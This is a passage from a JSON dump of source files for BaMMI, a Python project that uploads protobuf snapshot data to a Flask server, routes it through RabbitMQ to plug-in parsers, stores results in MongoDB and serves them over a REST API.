}, { "alpha_fraction": 0.6275706887245178, "alphanum_fraction": 0.6285346746444702, "avg_line_length": 40.49333190917969, "blob_id": "496cbe417e9ba82562cd6154259b848c360c7e5b", "content_id": "da3473b00c73b2edbae4588d3f58d1ccdbf94e7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3112, "license_type": "no_license", "max_line_length": 99, "num_lines": 75, "path": "/BaMMI/parsers/ParserHandler.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import importlib\nimport inspect\nimport json\nimport pathlib\nimport sys\nfrom .Context import Context\nfrom ..utils.PubSuber import PubSuber\nfrom ..utils.UtilFunctions import extract_json_from_raw_data, get_true_relative_path\n\n\nclass ParserHandler:\n\n def __init__(self, parsers_folder=get_true_relative_path(__file__, 'all_parsers')):\n self.parsers = {}\n self._load_parsers(parsers_folder)\n\n def _load_parsers(self, root_folder):\n root = pathlib.Path(root_folder).absolute()\n sys.path.insert(0, str(root.parent))\n for path in root.iterdir():\n if path.name.startswith('_') or not path.suffix == '.py':\n continue\n module = importlib.import_module(f'{root.name}.{path.stem}', package=root.name)\n self._load_parse_function(module)\n\n def _load_parse_function(self, module):\n for func_name, func in inspect.getmembers(module, inspect.isfunction):\n if not func_name.startswith('parse'):\n continue\n if isinstance(func.field, list):\n for field in func.field:\n self._add_parser_to_list(field, func)\n else:\n self._add_parser_to_list(func.field, func)\n\n def _add_parser_to_list(self, field, func):\n if field in self.parsers:\n self.parsers[field].append(func)\n else:\n self.parsers[field] = [func]\n\n def parse(self, field_name, raw_data_path):\n user_data, snapshot_data = extract_json_from_raw_data(raw_data_path)\n # TODO: Make base path something reasonable\n context = Context(get_true_relative_path(__file__, '../storage'), user_data, snapshot_data)\n if field_name not in self.parsers:\n raise ModuleNotFoundError(f\"Parser for {field_name} is not found\")\n if len(self.parsers[field_name]) > 1:\n # In case there's a few parsers for a certain field\n parser_results = []\n for func in self.parsers[field_name]:\n parser_results.append(func(context, snapshot_data))\n else:\n parser_results = self.parsers[field_name][0](context, snapshot_data)\n return {'user_data': user_data, 'snapshot_data': parser_results}\n\n def run_parser(self, field_name, mq_url):\n subscriber = PubSuber(mq_url)\n subscriber.init_exchange('snapshots_data', exchange_type='topic')\n subscriber.bind_queue(binding_keys=f'#.{field_name}.#')\n publisher = PubSuber(mq_url)\n publisher.init_exchange('parsers_results', exchange_type='topic')\n print(f\"Starting to listen to {field_name} on {mq_url}...\") # TODO: Put in Logger.Debug\n subscriber.consume_messages(\n lambda ch, method, properties, body: self._forward_parsing(field_name, body, publisher)\n )\n\n def _forward_parsing(self, field_name, data, publisher):\n parser_results = json.dumps(self.parse(field_name, data))\n publisher.publish_message(parser_results, field_name)\n\n\ndef run_parser(field_name, mq_url):\n ph = ParserHandler()\n ph.run_parser(field_name, mq_url)\n" }, { "alpha_fraction": 0.6785123944282532, "alphanum_fraction": 0.6785123944282532, "avg_line_length": 32.61111068725586, "blob_id": "80252bfe99714dd6b438df59871d07e4a5226dcf", "content_id": "d44c7a39cc06ae57726857a42d04b85418083c05", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 1210, "license_type": "no_license", "max_line_length": 87, "num_lines": 36, "path": "/BaMMI/utils/PubSuber.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .drivers.mq_drivers import mq_drivers\nfrom ..utils.UtilFunctions import find_driver\n\n\"\"\"\nAt first, I thought about separating the modules to Publisher and Subscriber,\nhowever, since we'll use the same message queue for both anyway (even if it's not RMQ),\nand there are some actions they do the same, I decided to mash it all in one module.\n\"\"\"\n\n\nclass PubSuber:\n\n def __init__(self, url):\n self.pub_sub_driver = find_pub_sub_driver(url)\n\n def publish_message(self, message, *args, **kwargs):\n self.pub_sub_driver.publish_message(message, *args, **kwargs)\n\n def consume_messages(self, callback, *args, **kwargs):\n self.pub_sub_driver.consume_messages(callback, *args, **kwargs)\n\n def init_queue(self, queue_name='', *args, **kwargs):\n self.pub_sub_driver.init_queue(queue_name, *args, **kwargs)\n\n def bind_queue(self, *args, **kwargs):\n self.pub_sub_driver.bind_queue(*args, **kwargs)\n\n def init_exchange(self, exchange_name, *args, **kwargs):\n self.pub_sub_driver.init_exchange(exchange_name, *args, **kwargs)\n\n def close(self):\n self.pub_sub_driver.close()\n\n\ndef find_pub_sub_driver(url: str):\n return find_driver(mq_drivers, url)\n" }, { "alpha_fraction": 0.7563636302947998, "alphanum_fraction": 0.7563636302947998, "avg_line_length": 29.55555534362793, "blob_id": "05dc201a0a3527d830278acfee9854d506391a27", "content_id": "fffd5ee9b23d5f67f9857b015f1a19a7b44fc335", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 102, "num_lines": 9, "path": "/tests/test_mq.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import pika\nimport pytest\n\n\n# Not a real test, used only to check docker-compose finished loading RMQ which takes most of the time\ndef test_mq_up():\n params = pika.ConnectionParameters('localhost')\n connection = pika.BlockingConnection(params)\n connection.channel()\n" }, { "alpha_fraction": 0.8039215803146362, "alphanum_fraction": 0.8039215803146362, "avg_line_length": 51, "blob_id": "d75f9ee4c554a30b8b006d0012e4d89cf0f63b8a", "content_id": "836b70401d26062181dd19309ec99507aef215b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 51, "num_lines": 1, "path": "/BaMMI/utils/__init__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .Connection import get_from_url, post_from_url" }, { "alpha_fraction": 0.5601022839546204, "alphanum_fraction": 0.5984655022621155, "avg_line_length": 23.4375, "blob_id": "dcca71d696706da49c36fce882463c9c2f8a01a9", "content_id": "2164ccf8250ab6730b21e8e4b0282ec36a2c674e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1564, "license_type": "no_license", "max_line_length": 100, "num_lines": 64, "path": "/tests/test_thought.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "# TODO: Update tests! 
They're old and not relevant\n\n\n# import datetime as dt\n# import struct\n#\n# import pytest\n#\n# user_id = 1\n# datetime = dt.datetime(2000, 1, 1, 10, 0)\n# thought = \"I'm hungry\"\n# serialized = b\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \\xd0m8\\x00\\x00\\x00\\x00\\n\\x00\\x00\\x00I'm hungry\"\n#\n#\n# @pytest.fixture\n# def t():\n#     return Thought(user_id, datetime, thought)\n#\n#\n# def test_attributes(t):\n#     assert t.user_id == user_id\n#     assert t.timestamp == datetime\n#     assert t.thought == thought\n#\n#\n# def test_repr(t):\n#     assert repr(t) == f'Thought(user_id={user_id!r}, timestamp={datetime!r}, thought={thought!r})'\n#\n#\n# def test_str(t):\n#     assert str(t) == f'[{datetime:%Y-%m-%d %H:%M:%S}] user {user_id}: {thought}'\n#\n#\n# def test_eq(t):\n#     t1 = Thought(user_id, datetime, thought)\n#     assert t1 == t\n#     t2 = Thought(user_id + 1, datetime, thought)\n#     assert t2 != t\n#     t3 = Thought(user_id, datetime + dt.timedelta(minutes=1), thought)\n#     assert t3 != t\n#     t4 = Thought(user_id, datetime, thought + '!')\n#     assert t4 != t\n#     t5 = 1\n#     assert t5 != t\n#     t6 = lambda: None\n#     t6.user_id = user_id\n#     t6.timestamp = datetime\n#     t6.thought = thought\n#     assert t6 != t\n#\n#\n# def test_serialize(t):\n#     assert t.serialize() == serialized\n#\n#\n# def test_deserialize(t):\n#     t = Thought.deserialize(serialized)\n#     assert t.user_id == user_id\n#     assert t.timestamp == datetime\n#     assert t.thought == thought\n#\n#\n# def test_symmetry(t):\n#     assert Thought.deserialize(t.serialize()) == t\n" }, { "alpha_fraction": 0.7200000286102295, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 34.42856979370117, "blob_id": "99cfced5d425c9326b397a833fc53e325acdd22d", "content_id": "6a2555e3d55fec25fbde56f2767d1580780f6bba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 73, "num_lines": 7, "path": "/BaMMI/parsers/all_parsers/Feelings.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "\n\ndef parse_feelings(context, snapshot):\n    if 'feelings' not in snapshot:\n        raise KeyError(\"Snapshot is missing the Feelings data\")\n    return context.format_returned_data('feelings', snapshot['feelings'])\n\n\nparse_feelings.field = 'feelings'\n" }, { "alpha_fraction": 0.6026850342750549, "alphanum_fraction": 0.613933265209198, "avg_line_length": 43.45161437988281, "blob_id": "d13b4418a4938ae60a0c0299a4e905c27689e7a6", "content_id": "fe74ad738ed3be3867c7339216505a59123d1517", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2756, "license_type": "no_license", "max_line_length": 110, "num_lines": 62, "path": "/BaMMI/api/API.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from flask import Blueprint, jsonify, send_from_directory\nfrom ..utils.APIServer import FlaskWrapper\nfrom ..utils.Constants import storage_folder, mongodb_url\nfrom ..utils.DBWrapper import DBWrapper\nfrom ..utils.UtilFunctions import build_path_for_files_from_data\n\n\nbp = Blueprint('serve_data', __name__, url_prefix='/users')\ndb = None\n\n\ndef run_api_server(host='127.0.0.1', port=5000, database_url=mongodb_url):\n    global db\n    db = DBWrapper(database_url)\n    app = FlaskWrapper('api')\n    app.register_blueprint(bp)\n    app.run(host=host, port=port)\n\n\n@bp.route('', methods=['GET'])\ndef get_all_users():\n    return jsonify(db.query_data({}, {'_id': 0, 'user_id': 1, 'username': 1}))\n\n\n@bp.route('/<user_id>', 
methods=['GET'])\ndef get_user_data(user_id):\n    return jsonify(db.query_data({'user_id': user_id},\n                                 {'_id': 0, 'user_id': 1, 'username': 1, 'birthday': 1, 'gender': 1}))\n\n\n@bp.route('/<user_id>/snapshots', methods=['GET'])\ndef get_user_snapshots(user_id):\n    return jsonify(db.query_data({'user_id': user_id}, {'_id': 0, 'user_id': 0, 'snapshots.datetime': 1}))\n\n\n@bp.route('/<user_id>/snapshots/<snapshot_id>', methods=['GET'])\ndef get_snapshot_details(user_id, snapshot_id):\n    snapshot_data = db.query_data({'user_id': user_id, 'snapshots.datetime': snapshot_id},\n                                  {'_id': 0, 'user_id': 0, 'birthday': 0, 'gender': 0, 'username': 0,\n                                   'snapshots.datetime': 0})\n    available_fields = list(snapshot_data['snapshots'].keys())\n    return jsonify(available_fields)\n\n\n@bp.route('/<user_id>/snapshots/<snapshot_id>/<result_name>', methods=['GET'])\ndef get_parsed_result(user_id, snapshot_id, result_name):\n    result_name = result_name.replace(\"-\", \"_\")\n    snapshot_data = db.query_data({'user_id': user_id, 'snapshots.datetime': snapshot_id},\n                                  {'_id': 0, f'snapshots.{result_name}': 1})\n    result = snapshot_data['snapshots'][0][result_name]\n    if isinstance(result, str):  # TODO: Come on... You can do better than that...\n        possible_file_path = result.split(storage_folder)[1]\n        if possible_file_path:  # We found that we're about to return path to the file from our storage folder\n            return jsonify(f'GET /users/{user_id}/snapshots/{snapshot_id}/{result_name}/data')\n    return jsonify(result)\n\n\n@bp.route('/<user_id>/snapshots/<snapshot_id>/<result_name>/data', methods=['GET'])\ndef get_file(user_id, snapshot_id, result_name):\n    result_name = result_name.replace(\"-\", \"_\")\n    return send_from_directory(storage_folder, build_path_for_files_from_data('.', user_id, snapshot_id,\n                                                                              f'{result_name}.jpg'))\n" }, { "alpha_fraction": 0.6740654110908508, "alphanum_fraction": 0.6740654110908508, "avg_line_length": 28.517240524291992, "blob_id": "b6d2eccbffedc0dbcbde2060af2feb3d40991bb9", "content_id": "0bc5cfe23da31d7344e2bab93329e2cffda814c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 856, "license_type": "no_license", "max_line_length": 94, "num_lines": 29, "path": "/BaMMI/client/Reader.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .ProtoDriver import ProtoDriver\n\n\nclass Reader:\n\n    def __init__(self, file_path):\n        self.reader_driver = find_reader_driver(file_path)\n\n    def close(self):\n        self.reader_driver.close()\n\n    def get_user_data(self):\n        return self.reader_driver.get_user_data()\n\n    def get_user_data_ready_to_send(self):\n        return self.reader_driver.get_user_data_ready_to_send()\n\n    def get_data_content_type(self):\n        return self.reader_driver.get_data_content_type()\n\n    def generate_snapshot_data_ready_to_send(self, server_accepted_fields=None):\n        return self.reader_driver.generate_snapshot_data_ready_to_send(server_accepted_fields)\n\n\ndef find_reader_driver(file_path):\n    drivers = {'.mind.gz': ProtoDriver}\n    for suffix, cls in drivers.items():\n        if file_path.endswith(suffix):\n            return cls(file_path)\n" }, { "alpha_fraction": 0.6748971343040466, "alphanum_fraction": 0.6748971343040466, "avg_line_length": 31.399999618530273, "blob_id": "3a9062716eeffb4ce440281a94e04925d0f54fbc", "content_id": "1ff01b2873b58039b28e0b2bf95bf872c0e1328f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 972, "license_type": "no_license", 
"max_line_length": 87, "num_lines": 30, "path": "/BaMMI/utils/DBWrapper.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .drivers.db_drivers import db_drivers\nfrom .UtilFunctions import find_driver\n\n\nclass DBWrapper:\n\n def __init__(self, url):\n self.db_driver = find_db_driver(url)\n\n def insert_single_data_unit(self, data):\n self.db_driver.insert_single_data_unit(data)\n\n def insert_many_data_units(self, data_list):\n self.db_driver.insert_many_data_units(data_list)\n\n def upsert_data_unit(self, key, data):\n self.db_driver.upsert_data_unit(key, data)\n\n def create_index_for_id(self, key_name, *args, **kwargs):\n self.db_driver.create_index_for_id(key_name, *args, **kwargs)\n\n def query_data(self, query=None, *args, **kwargs):\n return self.db_driver.query_data(query, *args, **kwargs)\n\n def insert_snapshot_data_by_user(self, user_id, snapshot_data, field_name):\n self.db_driver.insert_snapshot_data_by_user(user_id, snapshot_data, field_name)\n\n\ndef find_db_driver(url: str):\n return find_driver(db_drivers, url)\n" }, { "alpha_fraction": 0.8421052694320679, "alphanum_fraction": 0.8421052694320679, "avg_line_length": 47, "blob_id": "7fa6e49ec1464ea3d677c20b2f68f02de0d85381", "content_id": "2522c53f33b5d9c6b28397e0f08b186dc50e57dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "no_license", "max_line_length": 56, "num_lines": 2, "path": "/BaMMI/__init__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from BaMMI.server.Server import run_server as run_server\nfrom BaMMI.client.Reader import Reader" }, { "alpha_fraction": 0.672990083694458, "alphanum_fraction": 0.672990083694458, "avg_line_length": 34.709678649902344, "blob_id": "54792366a1c41e71d48b2cb53b75ac82cf0a694b", "content_id": "4e14de970887dec7967270ce0780f77516bcc566", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1107, "license_type": "no_license", "max_line_length": 107, "num_lines": 31, "path": "/BaMMI/utils/Connection.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import requests\n\n\ndef handle_request(request):\n try:\n request.raise_for_status()\n return request\n except requests.exceptions.HTTPError as e:\n print(f\"HTTP error: {e}\")\n except requests.exceptions.ConnectionError as e:\n print(f\"Connection error: {e}\")\n except requests.exceptions.Timeout as e:\n print(f\"Timeout Error: {e}\")\n except requests.exceptions.RequestException as e:\n print(f\"Something, somewhere went terribly wrong: {e}\")\n\n\ndef get_from_url(url: str, headers: dict = \"\") -> requests.Response:\n \"\"\"\n Sends a get request to the provided url adding the passed headers and params.\n \"\"\"\n data_request = requests.get(url, headers=headers)\n return handle_request(data_request)\n\n\ndef post_from_url(url: str, headers: dict = \"\", data=\"\", files=\"\", params: dict = \"\") -> requests.Response:\n \"\"\"\n Sends a post request to the provided url adding the passed headers, data, files and params.\n \"\"\"\n data_request = requests.post(url, headers=headers, data=data, files=files, params=params)\n return handle_request(data_request)\n" }, { "alpha_fraction": 0.7023809552192688, "alphanum_fraction": 0.7023809552192688, "avg_line_length": 13, "blob_id": "7e6a4e7b839489d3c8b3d3cbe473c83dc7825d98", "content_id": "97dc29ac979d5a179dd0adb9bf7cc228d67cc865", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 36, "num_lines": 6, "path": "/BaMMI/utils/drivers/db_drivers/__init__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .MongoDriver import MongoDriver\n\n\ndb_drivers = {\n 'mongodb': MongoDriver,\n}\n" }, { "alpha_fraction": 0.44692736864089966, "alphanum_fraction": 0.6703910827636719, "avg_line_length": 14, "blob_id": "28f17dfa0fd6a048c729a1cad413183aed290cf0", "content_id": "3e4b6e1b0c8a93250b18d040101f03dc097d380f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 179, "license_type": "no_license", "max_line_length": 17, "num_lines": 12, "path": "/requirements.txt", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "Click==7.0\ncodecov==2.0.16\nFlask==1.1.1\nmatplotlib==3.2.1\nnumpy==1.22.0\npika==1.1.0\nPillow==9.0.1\nprotobuf==3.15.0\npytest==5.3.2\npytest-cov==2.8.1\npymongo==3.10.1\nrequests==2.23.0" }, { "alpha_fraction": 0.6443629860877991, "alphanum_fraction": 0.6443629860877991, "avg_line_length": 40.96154022216797, "blob_id": "09c3a7b6cbfecd17d3522b4c8750e1bc6fb3fcbc", "content_id": "b94b8c8b95b3f1a085a6af1a2268de72d6b70e69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1091, "license_type": "no_license", "max_line_length": 88, "num_lines": 26, "path": "/BaMMI/client/client.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from .Reader import Reader\nfrom ..utils.Connection import get_from_url, post_from_url\n\n\ndef upload_sample(host: str, port: int, path: str):\n url = '/'.join((f'http://{\":\".join((host, str(port)))}', 'uploads'))\n reader = Reader(path)\n server_accepted_fields = get_server_fields('/'.join((url, 'config')))\n send_user_data('/'.join((url, 'users')), reader)\n send_snapshots_data('/'.join((url, 'snapshots')), reader, server_accepted_fields)\n\n\ndef send_user_data(url: str, reader: Reader):\n post_from_url(url, headers={'Content-Type': reader.get_data_content_type()},\n data=reader.get_user_data_ready_to_send())\n\n\ndef get_server_fields(url: str):\n return get_from_url(url).json()\n\n\ndef send_snapshots_data(url: str, reader: Reader, server_accepted_fields: list):\n user_id = reader.get_user_data().user_id\n for snapshot in reader.generate_snapshot_data_ready_to_send(server_accepted_fields):\n post_from_url(url, headers={'Content-Type': reader.get_data_content_type(),\n 'user-id': str(user_id)}, data=snapshot)\n" }, { "alpha_fraction": 0.6649937033653259, "alphanum_fraction": 0.6662484407424927, "avg_line_length": 25.566667556762695, "blob_id": "7b4362a86f79b51af6fbd7643b3067a2abc1a1f0", "content_id": "79fe8e439c15286db6ab661d2fb1233dba180d75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 797, "license_type": "no_license", "max_line_length": 64, "num_lines": 30, "path": "/BaMMI/saver/__main__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import sys\nimport click\nfrom .Saver import Saver\nfrom ..utils.Constants import mongodb_url\nfrom ..utils.CLITemplate import log, main\n\n\[email protected]()\[email protected]('-d', '--database', default=mongodb_url, type=str)\[email protected]('topic-name', type=str)\[email protected]('raw-data-path', type=click.Path(exists=True))\ndef save(database, topic_name, raw_data_path):\n saver = Saver(database)\n log(saver.save(topic_name, raw_data_path))\n\n\[email 
protected]('run-saver')\[email protected]('db_url', type=str)\[email protected]('mq_url', type=str)\ndef run_saver(db_url, mq_url):\n saver = Saver(db_url)\n log(saver.consume_topics(mq_url))\n\n\nif __name__ == '__main__':\n try:\n main(prog_name='saver', obj={})\n except Exception as error:\n log(f'ERROR: {error}')\n sys.exit(1)\n" }, { "alpha_fraction": 0.45281583070755005, "alphanum_fraction": 0.4558599591255188, "avg_line_length": 39.43077087402344, "blob_id": "b660313ef06cf8cfc420f04b2a307f352255aad1", "content_id": "0e6cf12f15e97a87672a482a4bbc81feced232b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2628, "license_type": "no_license", "max_line_length": 111, "num_lines": 65, "path": "/BaMMI/utils/drivers/db_drivers/MongoDriver.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient, ASCENDING, UpdateOne\n\n\nclass MongoDriver:\n\n def __init__(self, url, db_name=\"bammi_data\", table_name=\"users_and_snapshots\"):\n self.client = MongoClient(url)\n self.db = self.client[db_name]\n self.table_name = self.db[table_name]\n\n def insert_single_data_unit(self, data):\n self.table_name.insert_one(data)\n\n def insert_many_data_units(self, data_list):\n self.table_name.insert_many(data_list)\n\n def upsert_data_unit(self, key, data):\n self.table_name.update_one(key, data, upsert=True)\n\n def create_index_for_id(self, key_name, *args, **kwargs):\n self.table_name.create_index([(key_name, ASCENDING)], *args, **kwargs)\n\n def query_data(self, query=None, *args, **kwargs):\n return self.table_name.find(query, *args, **kwargs)\n\n def insert_snapshot_data_by_user(self, user_data, snapshot_data, field_name):\n # Idea for array upsert taken from https://stackoverflow.com/questions/22664972/mongodb-upsert-on-array\n user_id = user_data['user_id']\n operations = [\n # If the document doesn't exist at all, insert it\n UpdateOne({'user_id': user_id},\n {\n '$setOnInsert': {\n **{k: v for k, v in user_data.items()},\n 'snapshots': [{'datetime': snapshot_data['datetime']}]\n }\n },\n upsert=True\n ),\n # If the document exists, update it\n UpdateOne({'user_id': user_id,\n 'snapshots': {\n '$elemMatch': {\n 'datetime': snapshot_data['datetime']\n }\n }\n },\n {\n '$set':\n {\n f'snapshots.$.{field_name}': snapshot_data[field_name]\n }\n }\n ),\n # If an array element doesn't exist, add it. 
Won't conflict with the update a step before\n UpdateOne({'user_id': user_id, 'snapshots.datetime': snapshot_data['datetime']},\n {\n '$addToSet': {\n 'snapshots': {\n field_name: snapshot_data[field_name]\n }\n }\n })\n ]\n self.table_name.bulk_write(operations)\n" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.725806474685669, "avg_line_length": 48.79999923706055, "blob_id": "6fddb8366e8ee62fc129103f779446518acb8030", "content_id": "0b1a90776bdb58f92b57dab971bc1172318c9e2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 248, "license_type": "no_license", "max_line_length": 145, "num_lines": 5, "path": "/BaMMI/parsers/run_parsers.sh", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncommand_prefix=\"python -m BaMMI.parsers -t run-parser\"\nmq_url=\"rabbitmq://rabbitmq:5672/\"\n$command_prefix pose $mq_url & $command_prefix color_image $mq_url & $command_prefix depth_image $mq_url & $command_prefix feelings $mq_url && fg" }, { "alpha_fraction": 0.679049015045166, "alphanum_fraction": 0.6939078569412231, "avg_line_length": 47.07143020629883, "blob_id": "94caffeae2127d70899f51fcbf7446addc2888bb", "content_id": "18ccec53b2682f56657451f082c9c3198ccc97eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 673, "license_type": "no_license", "max_line_length": 110, "num_lines": 14, "path": "/BaMMI/server/Server.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from ..utils.APIServer import FlaskWrapper\nfrom ..server.Receiver import Receiver, publish_to_message_queue\n\n\ndef run_server(host='127.0.0.1', port=8000, publish=publish_to_message_queue):\n url_prefix = '/uploads'\n app = FlaskWrapper('server')\n receiver = Receiver(publish)\n app.add_endpoint(f'{url_prefix}/config', 'config', receiver.send_server_supported_fields, methods=['GET'])\n app.add_endpoint(f'{url_prefix}/users', 'user_upload', receiver.receive_user_data, methods=['POST'])\n app.add_endpoint(f'{url_prefix}/snapshots', 'snapshots_upload', receiver.receive_snapshot_data,\n methods=['POST'])\n\n app.run(host=host, port=port)\n" }, { "alpha_fraction": 0.6508293747901917, "alphanum_fraction": 0.652797281742096, "avg_line_length": 45.19480514526367, "blob_id": "77b019b347980664cf9205f2f5d90413d8fa8526", "content_id": "5eb40d11c5ee92b133a755da61dff1a6b8a78a58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3557, "license_type": "no_license", "max_line_length": 118, "num_lines": 77, "path": "/BaMMI/server/Receiver.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import json\nfrom flask import jsonify, request\nfrom google.protobuf.json_format import MessageToDict\nimport numpy as np\nfrom ..utils import UtilFunctions\nfrom ..utils.BaMMI_pb2 import Snapshot, User\nfrom ..utils.Constants import rabbit_mq_url\nfrom ..utils.PubSuber import PubSuber\n\n\ndef publish_to_message_queue(user_data, snapshot, binary_type_data, array_type_data,\n message_queue_url=rabbit_mq_url):\n data_to_publish = prepare_data_for_queue(user_data['user_id'], snapshot, binary_type_data, array_type_data)\n publisher = PubSuber(message_queue_url) # TODO: Make it so we don't connect to the MQ each time, wrap in a class?\n publisher.init_exchange('snapshots_data', exchange_type='topic')\n publisher.publish_message(json.dumps({'user_data': user_data, 'snapshot_data': data_to_publish}),\n 
'.'.join(data_to_publish.keys()))\n\n\ndef convert_binary_fields_to_files(user_id, data, binary_type_data, array_type_data):\n field_to_file_path = {}\n for field in data.ListFields():\n field_name = field[0].name\n if field_name in [*binary_type_data, *array_type_data]:\n field_data = field[1].data\n file_path = UtilFunctions.build_path_for_files_from_data(\n UtilFunctions.get_true_relative_path(__file__, '../storage'),\n user_id, str(data.datetime), '.'.join((field_name, 'raw')))\n if field_name in binary_type_data:\n UtilFunctions.save_data_to_file(field_data, file_path, 'b')\n else:\n array_data = np.array(field_data, dtype=float)\n array_data.astype('float').tofile(file_path)\n field_to_file_path[field_name] = file_path\n return field_to_file_path\n\n\ndef prepare_data_for_queue(user_id, data, binary_type_data, array_type_data):\n file_paths_data = convert_binary_fields_to_files(user_id, data, binary_type_data, array_type_data)\n data_to_publish = MessageToDict(data, preserving_proto_field_name=True)\n for field in file_paths_data:\n data_to_publish[field]['data'] = file_paths_data[field]\n return data_to_publish\n # TODO: In case data comes in other formats, convert it to a valid json\n\n\nclass Receiver:\n\n def __init__(self, publish_function):\n self.publish_function = publish_function\n self.message_type_data = ['pose', 'feelings', 'datetime']\n self.binary_type_data = ['color_image']\n self.array_type_data = ['depth_image']\n self.known_users = {}\n\n def send_server_supported_fields(self):\n return jsonify([*self.message_type_data, *self.binary_type_data, *self.array_type_data])\n\n def receive_user_data(self):\n user_data = request.data\n user = User()\n user.ParseFromString(user_data)\n user_dict = MessageToDict(user, preserving_proto_field_name=True)\n for field in user.DESCRIPTOR.fields:\n if field.name not in user_dict:\n # Handling case where zero-value enums are omitted - https://github.com/golang/protobuf/issues/258\n user_dict[field.name] = 0\n self.known_users[str(user.user_id)] = user_dict\n return jsonify(success=True)\n\n def receive_snapshot_data(self):\n user_id = request.headers.get('user-id')\n snapshot_data = request.data\n snapshot = Snapshot()\n snapshot.ParseFromString(snapshot_data)\n self.publish_function(self.known_users[user_id], snapshot, self.binary_type_data, self.array_type_data)\n return jsonify(success=True)\n" }, { "alpha_fraction": 0.6071707010269165, "alphanum_fraction": 0.6087295413017273, "avg_line_length": 35.112674713134766, "blob_id": "add4fada4fb88e1286c65cd6333ee110330f967b", "content_id": "c05da22eeb18680fb556142a9e43ff6677f7aa71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2566, "license_type": "no_license", "max_line_length": 91, "num_lines": 71, "path": "/BaMMI/client/ProtoDriver.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import gzip\nimport struct\nfrom ..utils.BaMMI_pb2 import User, Snapshot\n\n\nclass ProtoDriver:\n def __init__(self, file_path):\n self.f = gzip.open(file_path, 'rb')\n self.user = None\n\n def close(self):\n if self.f:\n self.f.close()\n self.f = None\n\n def get_user_data(self):\n if self.user is None and not self.f:\n raise RuntimeError(\"User data wasn't saved before file closed\")\n if self.user is None: # If we got here, self.f is already opened\n user_data_length = _read_message_length(self.f)\n user = User()\n user.ParseFromString(self.f.read(user_data_length))\n self.user = user\n return self.user\n\n def 
get_user_data_ready_to_send(self):\n return self.get_user_data().SerializeToString()\n\n def generate_snapshot_data_ready_to_send(self, server_accepted_fields):\n while self.f:\n snapshot_length = _read_message_length(self.f)\n if snapshot_length:\n snapshot = Snapshot()\n snapshot.ParseFromString(self.f.read(snapshot_length))\n for field in snapshot.ListFields():\n field_name = field[0].name\n if field_name not in server_accepted_fields:\n snapshot.ClearField(field_name)\n yield snapshot.SerializeToString()\n else: # EOF reached, no more snapshots\n return\n\n @staticmethod\n def get_data_content_type():\n return 'application/protobuf'\n\n\ndef _read_message_length(f):\n return _read_bytes_as_format_from_file(f, 4, 'I')\n\n\ndef _read_bytes_as_format_from_file(f, num_of_bytes, bytes_format, endian='little'):\n \"\"\"\n A relic from a time where reading binary data was the norm.\n Helper function to read bytes from a file and parse them according to the given format.\n :param f: An open file to read bytes from.\n :param num_of_bytes: The number of bytes that is required to read.\n :param bytes_format: The format which the bytes aligned to know how to unpack them.\n :param endian: little/big, according to the data endianness.\n :return: The data in the file according to the arguments given.\n \"\"\"\n if endian.lower() == 'little':\n endian = '<'\n elif endian.lower() == 'big':\n endian = '>'\n else:\n raise ValueError(\"Endian should be 'little' or 'big'\")\n bts = f.read(num_of_bytes)\n if 